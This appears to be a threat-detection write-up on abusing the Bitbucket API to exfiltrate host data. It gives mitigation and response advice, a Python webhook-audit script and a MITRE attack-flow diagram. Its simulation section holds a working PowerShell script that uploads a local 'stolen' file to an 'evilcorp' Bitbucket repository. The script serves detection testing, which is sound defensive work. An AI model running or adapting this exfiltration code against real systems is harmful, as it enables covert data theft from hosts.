SOC Prime Bias: Medium

06 Apr 2026 17:58

Bitbucket API Abuse: A Simple Trick for Stealthy Data Theft


Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

This proof of concept shows how a small C program can abuse the Bitbucket webhook API to exfiltrate host telemetry from a compromised Windows system. It collects details such as hostname, OS build, CPU information, and network adapter data, then hides the output inside the description field of a newly created webhook, blending into normal cloud traffic quietly.

Investigation

The author shares the full source, build steps, and sample curl requests that create, inspect, and delete the webhook used for leakage, covering the flow end-to-end. The compiled binary was executed on a Windows 10 x64 22H2 host in an ANY.RUN sandbox and transmitted data without obvious alerts. The write-up also notes similar Git platform abuse documented in recent APT activity.

Mitigation

Monitor outbound HTTPS to Bitbucket and other code hosts, and flag API calls that create webhooks unexpectedly or contain odd description text. Require strong authentication, limit and scope API tokens, apply least privilege, and audit repository configuration changes regularly.

Response

On detection, block outbound Bitbucket traffic from the host, revoke exposed API tokens, and inventory webhooks across repositories to remove malicious entries. Collect endpoint artifacts for forensics, scan for follow-on payloads, and rotate credentials for CI/CD and developer accounts.
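The webhook inventory called for above can be scripted against the listing the repository API returns; the check below is an added example written for this note (not code from the PoC, SOC Prime, or any Bitbucket client library). It assumes a listing with `uuid`, `description` and `url` fields, an allow-list of expected webhook destinations supplied by the defender, and uses constructed sample records, one of which carries base64-wrapped host details in its description as in the PoC.

```python
import base64
import json
import re
from urllib.parse import urlparse

# Constructed sample in the shape of Bitbucket Cloud's repository webhook listing
# (assumption: only the uuid, description and url fields are modelled; values are made up).
_HIDDEN = base64.b64encode(b"Hostname: WIN-DESKTOP; OS: 10.0.19045; CPU: x64").decode()
SAMPLE_HOOKS_JSON = json.dumps({"values": [
    {"uuid": "{1111}", "description": "CI notifier", "url": "https://ci.example.test/hook"},
    {"uuid": "{2222}", "description": _HIDDEN, "url": "https://example.test/x"},
    {"uuid": "{3333}", "description": "host=WIN-DESKTOP os=10.0.19045 cpu=x64 ip=10.0.0.5",
     "url": "https://example.test/y"},
]})
# Substrings that read like host telemetry rather than a webhook's purpose.
TELEMETRY_TOKENS = ("hostname", "host=", "os=", "cpu", "processor", "adapter", "ip=")
# A description that is one long base64 run is not human-written text.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")

def decode_if_base64(text):
    """Return the decoded UTF-8 text when `text` is a single base64 blob, else None."""
    if not B64_RE.match(text):
        return None
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def suspicious_reasons(hook, allowed_hosts):
    """List why one webhook record looks like a data container (empty when clean)."""
    desc = hook.get("description") or ""
    reasons = []
    decoded = decode_if_base64(desc)
    if decoded is not None:
        reasons.append("base64 description")
        desc = desc + " " + decoded            # inspect the decoded text as well
    hits = [t for t in TELEMETRY_TOKENS if t in desc.lower()]
    if hits:
        reasons.append("telemetry keywords: " + ", ".join(hits))
    host = urlparse(hook.get("url") or "").hostname or ""
    if host not in allowed_hosts:
        reasons.append("webhook url host not in allowlist: " + host)
    return reasons

def audit_hooks(hooks_json, allowed_hosts):
    """Return [(uuid, reasons)] for every webhook in the listing that raises a flag."""
    hooks = json.loads(hooks_json).get("values", [])
    flagged = [(h.get("uuid"), suspicious_reasons(h, allowed_hosts)) for h in hooks]
    return [(uuid, reasons) for uuid, reasons in flagged if reasons]
```

Run it over each repository's hook listing after fetching it with a read-scoped token; anything it flags is a candidate for removal and for a look at which account created it.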

Attack Flow

```mermaid
graph TB
  %% Class definitions
  classDef technique fill:#ffcccc
  classDef tool fill:#cce5ff
  classDef action fill:#d5f5d6

  %% Nodes
  action_collect["<b>Action</b> – Collect system information"]
  class action_collect action
  tech_sysinfo["<b>Technique</b> – <b>T1082 System Information Discovery</b><br/><b>Description</b>: Collects host details such as hostname, OS version, CPU architecture, processor count, logical drives, and IP addresses."]
  class tech_sysinfo technique
  tool_bitbucket["<b>Tool</b> – Bitbucket Cloud REST API<br/><b>Method</b>: POST with Base64 encoded username:API-token"]
  class tool_bitbucket tool
  tech_webservice["<b>Technique</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/><b>Description</b>: Uses a legitimate web service API to send and receive data."]
  class tech_webservice technique
  tech_exfil_repo["<b>Technique</b> – <b>T1567.001 Exfiltration Over Web Service: Exfiltration to Code Repository</b><br/><b>Description</b>: Uploads collected data to a code-hosting repository via the service's API."]
  class tech_exfil_repo technique
  tech_exfil_webhook["<b>Technique</b> – <b>T1567.004 Exfiltration Over Web Service: Exfiltration Over Webhook</b><br/><b>Description</b>: Sends data through a configured webhook to transport information out of the environment."]
  class tech_exfil_webhook technique
  tech_obfuscation["<b>Technique</b> – <b>T1001.003 Data Obfuscation: Protocol or Service Impersonation</b><br/><b>Description</b>: Masks malicious traffic as normal API calls to a trusted service."]
  class tech_obfuscation technique

  %% Connections
  action_collect -->|uses| tech_sysinfo
  tech_sysinfo -->|provides data to| tool_bitbucket
  tool_bitbucket -->|leverages| tech_webservice
  tool_bitbucket -->|creates webhook for| tech_exfil_repo
  tool_bitbucket -->|creates webhook for| tech_exfil_webhook
  tech_webservice -->|is concealed by| tech_obfuscation
  tech_exfil_repo -->|exfiltrates data via| tech_obfuscation
  tech_exfil_webhook -->|exfiltrates data via| tech_obfuscation
```

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The simulated adversary has obtained a small data set (e.g., C:\temp\stolen.txt) and wishes to exfiltrate it to a private Bitbucket repository without raising suspicion. To blend in with legitimate development tools, the attacker chooses the native WinHTTP COM object (WinHttp.WinHttpRequest.5.1) because it is commonly present on Windows systems and directly invokes the WinHttpConnect and WinHttpSendRequest functions that the detection rule watches.

    1. Create a temporary file containing dummy exfil data.
    2. Instantiate the WinHTTP COM object.
    3. Open a POST connection to https://api.bitbucket.org/2.0/repositories/<team>/<repo>/src.
    4. Set appropriate headers (Authorization: Basic …, Content-Type: multipart/form-data).
    5. Send the file contents.
    6. Verify the HTTP 200 response.

    This exact sequence causes Sysmon to log a NetworkConnect event where the process is powershell.exe and the function chain includes WinHttpConnect and WinHttpSendRequest, satisfying the Sigma rule.

  • Regression Test Script:

```powershell
# --------------------------------------------------------------
# Bitbucket API Exfiltration via WinHTTP (Trigger Sigma Rule)
# --------------------------------------------------------------
$tempFile    = "C:\temp\stolen.txt"
$repoOwner   = "evilcorp"
$repoName    = "leaked-data"
$username    = "eviluser"
$appPassword = "APPPASSWD"   # placeholder Bitbucket app password
# Basic auth header: Base64 of "username:appPassword". The braces stop PowerShell
# from reading "$username:" as a scope/drive qualifier.
$authHeader  = "Basic " + [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("${username}:${appPassword}"))

# 1. Create dummy data (and its folder) if not present
if (-not (Test-Path $tempFile)) {
    New-Item -ItemType Directory -Path (Split-Path $tempFile) -Force | Out-Null
    "Sensitive data collected by adversary" | Set-Content -Path $tempFile -Encoding UTF8
}

# 2. Build multipart/form-data payload (here-string lines must start in column 1)
$boundary = "----WebKitFormBoundary$(Get-Random -Maximum 999999)"
$body = @"
--$boundary
Content-Disposition: form-data; name="files"; filename="$(Split-Path $tempFile -Leaf)"
Content-Type: application/octet-stream

$(Get-Content $tempFile -Raw)
--$boundary--
"@

# 3. Initialise WinHTTP COM object
$winHttp = New-Object -ComObject "WinHttp.WinHttpRequest.5.1"

# 4. Open POST request
$url = "https://api.bitbucket.org/2.0/repositories/$repoOwner/$repoName/src"
$winHttp.Open("POST", $url, $false)   # synchronous request

# 5. Set required headers
$winHttp.SetRequestHeader("Authorization", $authHeader)
$winHttp.SetRequestHeader("Content-Type", "multipart/form-data; boundary=$boundary")
$winHttp.SetRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)")

# 6. Send payload (this triggers WinHttpConnect + WinHttpSendRequest)
$winHttp.Send($body)

# 7. Output response status for verification
Write-Host "HTTP Status:" $winHttp.Status
Write-Host "Response Body:" $winHttp.ResponseText
```
  • Cleanup Commands:

```powershell
# Remove temporary file
Remove-Item -Path "C:\temp\stolen.txt" -Force -ErrorAction SilentlyContinue

# Optionally revoke the Bitbucket app password manually via web UI
Write-Host "Cleanup complete. Remember to delete the uploaded file from the repository if needed."
```